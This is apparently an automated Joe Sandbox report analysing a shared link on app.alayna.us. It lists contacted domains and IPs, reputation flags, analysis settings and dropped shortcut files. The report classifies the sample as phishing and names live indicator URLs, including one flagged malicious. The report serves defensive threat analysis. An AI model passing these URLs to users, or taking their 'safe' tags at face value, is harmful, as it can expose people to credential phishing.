              https://a.nel.cloudflare.com/report/v4?s=AW8eoUYW9oj1Yjl3MIthJhwQDxBo65b9C2uSzEBIJ126msqmF5iUla4NpK0zVyYJSfkojXAaxGml778M%2Fjx%2BaFMcOV2BJxkgdv%2BPQcaTMejVC7s6wd38SFYlqybB%2BUnEEgZS%2FOyR9u08YF3h7VUf7tSW0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ActiveTool.BqIvIPyM.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.CpbEpqIL.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ActiveTool.DehqpDq-.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.D1TXq2aj.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/workbox-296e213d.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/manifest.webmanifest0%Avira URL Cloudsafe
              https://app.alayna.us/graphql0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.CtWPaFVW.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.hMOnG-tb.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Layout.mRBQSVK9.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/imgs/pwa-192x192.png0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ExclamationTriangleIcon.BNGKdN9E.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ActivateUser.sXFMIOsx.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/YouTube.DOFcxXms.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.DUmOG7j4.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.DAq5dCaE.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Transition.1nOyKJ9c.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ShareResourceScene.DMUPBnxd.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ErrorBoundary.BPkKvPXm.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/AiToolProvider.DS2zOm_j.js0%Avira URL Cloudsafe
              https://js.intercomcdn.com/app.c594e88c.js0%Avira URL Cloudsafe
              https://js.intercomcdn.com/launcher-discovery.a1869a1c.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/AiToolProvider.BNBOsyPR.css0%Avira URL Cloudsafe
              https://js.intercomcdn.com/vendors~app.bffb7b75.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Auth.DFj5DoB1.js0%Avira URL Cloudsafe
              https://nexus-websocket-a.intercom.io/pubsub/5-P_49hX0Pd8PuHTk73GbrwVPlOCx815QTT_9m_yfXsbn5PTmVbOm-FFszLrHPc8bUZUNyC_5cOkzTDMCvNHnTSPW87_deDbxFrAcL?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor0%Avira URL Cloudsafe
              https://ewr1.vultrobjects.com/favicon.ico0%Avira URL Cloudsafe
              https://res.cloudinary.com/almanac/image/upload/v1736504114/workspace_portal_uploads/Onedrive_Business_ogdmlp.jpg0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Authenticated.C3teI_ol.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Avatar.47vy-PoE.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/AITools.DdDAMa67.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Auth.DgrpP85N.css0%Avira URL Cloudsafe
              https://js.intercomcdn.com/app~tooltips.4fe09fcc.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Authenticated.CHp2mxHq.js0%Avira URL Cloudsafe
              https://xqg4v.jaamzjd.ru/pani$85uk6xo0%Avira URL Cloudsafe
              https://app.alayna.us/imgs/logos/logo-no-text.png0%Avira URL Cloudsafe
              https://es.urboydaudi.com/ZxoLb/0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Chat.DX_SIGlb.js0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              jsdelivr.map.fastly.net
              151.101.1.229
              truefalse
                high
                do.featurebase.app
                104.26.5.58
                truefalse
                  high
                  a.nel.cloudflare.com
                  35.190.80.1
                  truefalse
                    high
                    s3-r-w.us-west-2.amazonaws.com
                    52.92.149.74
                    truefalse
                      high
                      api-js.mixpanel.com
                      35.186.241.51
                      truefalse
                        high
                        widget.intercom.io
                        143.204.98.100
                        truefalse
                          high
                          alayna-ai-prod-app.onrender.com.cdn.cloudflare.net
                          216.24.57.4
                          truefalse
                            unknown
                            api-iam.intercom.io
                            54.144.14.220
                            truefalse
                              high
                              xqg4v.jaamzjd.ru
                              104.21.96.1
                              truefalse
                                unknown
                                code.jquery.com
                                151.101.66.137
                                truefalse
                                  high
                                  cdnjs.cloudflare.com
                                  104.17.25.14
                                  truefalse
                                    high
                                    o4505928814231552.ingest.sentry.io
                                    34.120.195.249
                                    truefalse
                                      unknown
                                      e1315.dsca.akamaiedge.net
                                      2.19.224.32
                                      truefalse
                                        high
                                        resc.cloudinary.com.cdn.cloudflare.net
                                        104.17.201.1
                                        truefalse
                                          high
                                          ewr1.vultrobjects.com
                                          108.61.0.122
                                          truefalse
                                            high
                                            challenges.cloudflare.com
                                            104.18.94.41
                                            truefalse
                                              high
                                              www.google.com
                                              142.250.186.164
                                              truefalse
                                                high
                                                es.urboydaudi.com
                                                104.21.16.1
                                                truetrue
                                                  unknown
                                                  nexus-websocket-a.intercom.io
                                                  35.174.127.31
                                                  truefalse
                                                    high
                                                    js.intercomcdn.com
                                                    18.245.46.20
                                                    truefalse
                                                      high
                                                      res.cloudinary.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        cdn.jsdelivr.net
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          alayna-app.s3.us-west-2.amazonaws.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            app.alayna.us
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              https://app.alayna.us/client/sw.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://app.alayna.us/client/assets/AiToolProvider.DS2zOm_j.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://app.alayna.us/client/assets/Layout.WVpeZX22.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://app.alayna.us/client/imgs/favicon-askalayna.svgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                                high
                                                                https://cdnjs.cloudflare.com/ajax/libs/draft-js/0.7.0/Draft.min.cssfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api-iam.intercom.io/messenger/web/launcher_settingsfalse
                                                                  high
                                                                  https://app.alayna.us/client/assets/index.KaME38Zl.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://js.intercomcdn.com/vendor.2947c1f5.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://app.alayna.us/client/assets/Layout.CsRrMVM6.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://widget.intercom.io/widget/qer2dd6pfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://app.alayna.us/client/assets/Layout.CYQvu7YC.cssfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://a.nel.cloudflare.com/report/v4?s=AW8eoUYW9oj1Yjl3MIthJhwQDxBo65b9C2uSzEBIJ126msqmF5iUla4NpK0zVyYJSfkojXAaxGml778M%2Fjx%2BaFMcOV2BJxkgdv%2BPQcaTMejVC7s6wd38SFYlqybB%2BUnEEgZS%2FOyR9u08YF3h7VUf7tSWfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://app.alayna.us/client/assets/ShareResourceScene.BY3t8mu1.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api-iam.intercom.io/messenger/web/metricsfalse
                                                                    high
                                                                    https://app.alayna.us/client/manifest.webmanifestfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/ActiveTool.DehqpDq-.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/workbox-296e213d.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/Layout.mRBQSVK9.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/index.CtWPaFVW.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://nexus-websocket-a.intercom.io/pubsub/5-P_49hX0Pd8PuHTk73GbrwVPlOCx815QTT_9m_yfXsbn5PTmVbOm-FFszLrHPc8bUZUNyC_5cOkzTDMCvNHnTSPW87_deDbxFrAcL?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitorfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/index.hMOnG-tb.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://js.intercomcdn.com/launcher-discovery.a1869a1c.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/ExclamationTriangleIcon.BNGKdN9E.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/ActivateUser.sXFMIOsx.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/index.DAq5dCaE.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/YouTube.DOFcxXms.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/Transition.1nOyKJ9c.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/index.DUmOG7j4.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app.alayna.us/client/assets/ShareResourceScene.DMUPBnxd.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://challenges.cloudflare.com/turnstile/v0/b/b0e4a89976ce/api.jsfalse
                                                                      high
                                                                      https://js.intercomcdn.com/app.c594e88c.jsfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://ewr1.vultrobjects.com/palmerww/index.htmlfalse
                                                                        unknown
                                                                        https://ewr1.vultrobjects.com/favicon.icofalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://app.alayna.us/client/assets/AiToolProvider.BNBOsyPR.cssfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://js.intercomcdn.com/vendors~app.bffb7b75.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                          high
                                                                          https://app.alayna.us/client/assets/Authenticated.C3teI_ol.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.cssfalse
                                                                            high
                                                                            https://app.alayna.us/client/assets/Modal.Bgpq4lFm.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://app.alayna.us/client/assets/index.CLF8hfvb.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://res.cloudinary.com/almanac/image/upload/v1736504114/workspace_portal_uploads/Onedrive_Business_ogdmlp.jpgfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://app.alayna.us/client/assets/index.CmaSzYmM.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://app.alayna.us/client/assets/Auth.DFj5DoB1.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://app.alayna.us/client/assets/Avatar.47vy-PoE.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://do.featurebase.app/js/sdk.jsfalse
                                                                              high
                                                                              https://app.alayna.us/client/assets/Offline.Chq9LeuO.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://js.intercomcdn.com/frame.cab515ec.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                                high
                                                                                https://app.alayna.us/client/assets/decode.I0H7hHej.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://app.alayna.us/client/assets/ActivateUser.CFVvUFSP.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://app.alayna.us/share/r/RM0eszjvKftrue
                                                                                  unknown
                                                                                  https://o4505928814231552.ingest.sentry.io/api/4505968358326272/envelope/?sentry_version=7&sentry_key=7891508b33b6a44378926ce96ad52c44&sentry_client=sentry.javascript.react%2F8.55.0false
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://app.alayna.us/index.tsxfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://js.intercomcdn.com/vendors~app~tooltips.07c9076a.jsfalse
                                                                                    high
                                                                                    https://app.alayna.us/client/assets/Auth.DgrpP85N.cssfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://app.alayna.us/client/assets/Authenticated.CHp2mxHq.jsfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://js.intercomcdn.com/app~tooltips.4fe09fcc.jsfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://app.alayna.us/client/assets/index.CpbEpqIL.cssfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://app.alayna.us/client/assets/ActiveTool.BqIvIPyM.cssfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://app.alayna.us/client/assets/AITools.DdDAMa67.jsfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://app.alayna.us/client/assets/index.D1TXq2aj.jsfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://app.alayna.us/graphqlfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api-iam.intercom.io/messenger/web/pingfalse
                                                                                      high
                                                                                      https://xqg4v.jaamzjd.ru/pani$85uk6xofalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://app.alayna.us/client/imgs/pwa-192x192.pngfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://es.urboydaudi.com/ZxoLb/true
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://app.alayna.us/imgs/logos/logo-no-text.pngfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.cssfalse
                                                                                        high
                                                                                        https://app.alayna.us/client/assets/ErrorBoundary.BPkKvPXm.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://app.alayna.us/client/assets/Chat.DX_SIGlb.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        2.19.224.32
                                                                                        e1315.dsca.akamaiedge.netEuropean Union
                                                                                        16625AKAMAI-ASUSfalse
                                                                                        35.186.241.51
                                                                                        api-js.mixpanel.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        130.211.34.183
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.217.18.14
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        173.194.76.84
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.18.94.41
                                                                                        challenges.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.26.5.58
                                                                                        do.featurebase.appUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        35.174.127.31
                                                                                        nexus-websocket-a.intercom.ioUnited States
                                                                                        14618AMAZON-AESUSfalse
                                                                                        142.250.185.227
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        216.24.57.4
                                                                                        alayna-ai-prod-app.onrender.com.cdn.cloudflare.netUnited States
                                                                                        397273RENDERUSfalse
                                                                                        104.21.80.1
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        74.125.206.84
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        34.196.233.208
                                                                                        unknownUnited States
                                                                                        14618AMAZON-AESUSfalse
                                                                                        34.237.73.95
                                                                                        unknownUnited States
                                                                                        14618AMAZON-AESUSfalse
                                                                                        104.21.96.1
                                                                                        xqg4v.jaamzjd.ruUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        54.83.229.85
                                                                                        unknownUnited States
                                                                                        14618AMAZON-AESUSfalse
                                                                                        151.101.66.137
                                                                                        code.jquery.comUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        35.190.80.1
                                                                                        a.nel.cloudflare.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.217.18.10
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        143.204.98.100
                                                                                        widget.intercom.ioUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        18.245.46.20
                                                                                        js.intercomcdn.comUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        108.61.0.122
                                                                                        ewr1.vultrobjects.comUnited States
                                                                                        20473AS-CHOOPAUSfalse
                                                                                        54.144.14.220
                                                                                        api-iam.intercom.ioUnited States
                                                                                        14618AMAZON-AESUSfalse
                                                                                        172.217.16.200
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.184.195
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        151.101.1.229
                                                                                        jsdelivr.map.fastly.netUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        104.17.24.14
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.21.16.1
                                                                                        es.urboydaudi.comUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        1.1.1.1
                                                                                        unknownAustralia
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        216.58.212.131
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.217.16.206
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.186.163
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.185.234
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.26.4.58
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.18.95.41
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.2.137
                                                                                        unknownUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        239.255.255.250
                                                                                        unknownReserved
                                                                                        unknownunknownfalse
                                                                                        52.92.149.74
                                                                                        s3-r-w.us-west-2.amazonaws.comUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        142.250.186.164
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.17.201.1
                                                                                        resc.cloudinary.com.cdn.cloudflare.netUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        64.233.184.84
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.217.18.104
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        34.120.195.249
                                                                                        o4505928814231552.ingest.sentry.ioUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.17.25.14
                                                                                        cdnjs.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        18.245.46.55
                                                                                        unknownUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        IP
                                                                                        192.168.2.17
                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1624163
                                                                                        Start date and time:2025-02-25 22:19:25 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                        Sample URL:https://app.alayna.us/share/r/RM0eszjvKf
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:21
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • EGA enabled
                                                                                        Analysis Mode:stream
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal76.phis.win@19/78@72/443
                                                                                        • Exclude process from analysis (whitelisted): SIHClient.exe, SgrmBroker.exe, TextInputHost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.185.227, 172.217.18.14, 64.233.184.84, 142.250.186.142, 142.250.185.234, 74.125.206.84, 142.250.186.163, 142.250.184.206, 172.217.18.104, 173.194.76.84, 142.250.185.142, 172.217.16.200, 172.217.16.206, 216.58.206.46, 4.175.87.197, 23.60.203.209
                                                                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients2.google.com, redirector.gvt1.com, www.googletagmanager.com, sls.update.microsoft.com, clients.l.google.com, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: https://app.alayna.us/share/r/RM0eszjvKf
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 20:19:57 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2677
                                                                                        Entropy (8bit):3.998537174340068
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:DA66E88045FFD846E710F291E7D9CD6F
                                                                                        SHA1:D90F67512486C776E1D4C36BC0886C2EA02DE3E3
                                                                                        SHA-256:37966A434EC8F6F027336D63C226E1F756AFFABAC7B02799ADDDB68D79330CD6
                                                                                        SHA-512:DDFA07D71A9F955D807E98E370FFFF20F50EA06230322FBAD21810229635F257D79F3C4BDA8AB34D81E052E3F550FB214DAE940E6223EE55BBE05F69C2D5B780
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,....ZF7........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYZt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZ|.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYZ|.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYZ|............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYZ}............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 20:19:57 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2679
                                                                                        Entropy (8bit):4.017888978487055
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:87EF25E58B4816EB047A2657BA8091EE
                                                                                        SHA1:CAC61195EBDC7FCB5557AB98175136F43327DA35
                                                                                        SHA-256:670DBDCAC42DFA164B1D1C4C6038C3C9D8F11261A873D8564F459C34A1769478
                                                                                        SHA-512:6C8FBA10B7D576C3290FECAED6468A2FBA7B91526CC4771FA96ABE0F39E2EB3201B7F10B20E72D034B23070C71F32DB29B0FA9E1CAEF503C7580C28B9E9FF285
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,.....<)........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYZt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZ|.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYZ|.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYZ|............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYZ}............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2693
                                                                                        Entropy (8bit):4.024203967083347
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:AA0445D0B346B6A36F4692E3484892C4
                                                                                        SHA1:221365D043BDCA07FADCCD88087E24C5AB6C1C2B
                                                                                        SHA-256:DFBD46C93EE554E43705D0C553B963EE50317779C716CE2708D38D89312EB5D0
                                                                                        SHA-512:59BDBC76AD817FE28F3942FE772DA896534E50132A96C8DCF8EC854CE810E3C8B687E0FB355E1CDDDEE1732B17A03F845C5EF1295C79C2E942C3FE03F1BCF04F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYZt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZ|.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYZ|.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYZ|............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
